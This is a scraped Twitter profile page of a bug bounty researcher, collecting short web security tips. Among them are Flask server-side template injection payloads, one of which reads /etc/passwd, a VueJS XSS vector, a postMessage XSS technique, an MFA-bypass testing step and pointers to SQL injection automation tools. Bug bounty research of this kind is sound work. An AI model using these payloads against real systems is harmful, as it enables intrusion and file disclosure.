Zeeshan Khalid (@z33_5h4n) 's Twitter Profile
Zeeshan Khalid

@z33_5h4n

Ethical Hacker, Web Application Security Researcher & Web Programmer.

ID: 705968556333076480

linkhttp://zeeshankhalid.com calendar_today05-03-2016 04:09:54

124 Tweet

1,1K Followers

99 Following

siLLyDaddy (@sillydadddy) 's Twitter Profile Photo

#bugbountytips (1/2) Sometimes we will be able to access the functionalities , that are ONLY accessible after MFA auth , by using the cookies obtained before MFA auth . Steps :- 1:- Do MFA auth 2:- Note down the endpoints or send the requests to repeater 3:-Now logout

siLLyDaddy (@sillydadddy) 's Twitter Profile Photo

#bugbounty #bugbountytips Automate sql injection 1.Browse all the application 2. Save all requests from burp to a file 3.Use github.com/Miladkhoshdel/… to automate . If WAF use github.com/m4ll0k/Atlas .thanks Hussein Daher for showing this. Thanks tool creators !!

Sapra (@0xsapra) 's Twitter Profile Photo

Python Flask SSTI Payloads and tricks * {{url_for.__globals__}} * {{request.environ}} * {{config}} *`{{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}` * {{self}} * request|attr('__class__') == request.__class__ == request[\x5f\x5fclass\x5f\x5f] #bugbountytips

PortSwigger Research (@portswiggerres) 's Twitter Profile Photo

Here's an explanation of the wonderful vector by William Bowling that successfully solved one of our "impossible" labs. The original submission can be found here: jsfiddle.net/vakzz/g2two0qs/ The vector no longer works because the length restriction is reduced.

Here's an explanation of the wonderful vector by <a href="/wcbowling/">William Bowling</a> that successfully solved one of our "impossible" labs. 

The original submission can be found here:
jsfiddle.net/vakzz/g2two0qs/

The vector no longer works because the length restriction is reduced.
Rutik Sangle (@_rutik_sangle_) 's Twitter Profile Photo

Some blogs that helped me: medium.com/@ghostlulzhack… medium.com/@weblab_tech/g… medium.com/@the.bilal.riz… #bugbountytips #infosec #DYPTC #Quarantine

PortSwigger Research (@portswiggerres) 's Twitter Profile Photo

We've added a VueJS section to the XSS cheat sheet. With a new very short vector from Gareth Heyes \u2028 <x v-html=_c.constructor('alert(1)')()> also contains vectors from Cure53 and Eduardo Vela Sebastian Lekies koto portswigger.net/web-security/c…

Stefan Rows 🧑🏼‍💻 (@stefanrows) 's Twitter Profile Photo

Everyone thinks Bug Hunters make big $$$ because all of the "Found xxx earned $$$" posts on here. I think people should be aware of that this is not common. Full Time Bug Bounty Hunters, what is your average month looking like? Would be interesting to see what the reality is.

siLLyDaddy (@sillydadddy) 's Twitter Profile Photo

#bugbountytip I completed 6 months in BB Things I learned : 1 . Never trust the platform .Don't waste time sending support mails or contact their high profile employees who boast in public about researcher well fare .All you will get is "professional English" in return .

bugcrowd (@bugcrowd) 's Twitter Profile Photo

🎁 Merry X(SS)MAS! Hackers!🎄 Beginning today we are doing 12 swag-ful days of giveaways and challenges. Today's challenge is simple: spread the cheer of #XSSMAS with a retweet of this tweet to be one of 12 researchers to get today's exclusive swag! ☃️

‌Renwa (@renwax23) 's Twitter Profile Photo

For postMessage XSS and you can't iframe the page don't use window open() then reference to that window to send the message. In the application look for any location you can put a link to your site that doesn't have rel=noopener then use opener.postMessage to send your payload

Zeeshan Khalid (@z33_5h4n) 's Twitter Profile Photo

🦁 Proud to share my 2024 #HackerOne journey: 89 vulnerabilities reported, including 4 critical finds! Specializing in XSS hunting and web security. Thanks to HackerOne for providing an amazing platform for security researchers! 🔐 #InfoSec #BugBounty hackerone.com/stories-of-202…

Zeeshan Khalid (@z33_5h4n) 's Twitter Profile Photo

9 years in H1's Top 100 all-time. First made it in 2016, and still here at the top 100 today. Probably my last time here as I've slowed down hunting there after too many bad program/triage/mediation experiences over the last few years. End of an era!

9 years in H1's Top 100 all-time. First made it in 2016, and still here at the top 100 today. Probably my last time here as I've slowed down hunting there after too many bad program/triage/mediation experiences over the last few years. End of an era!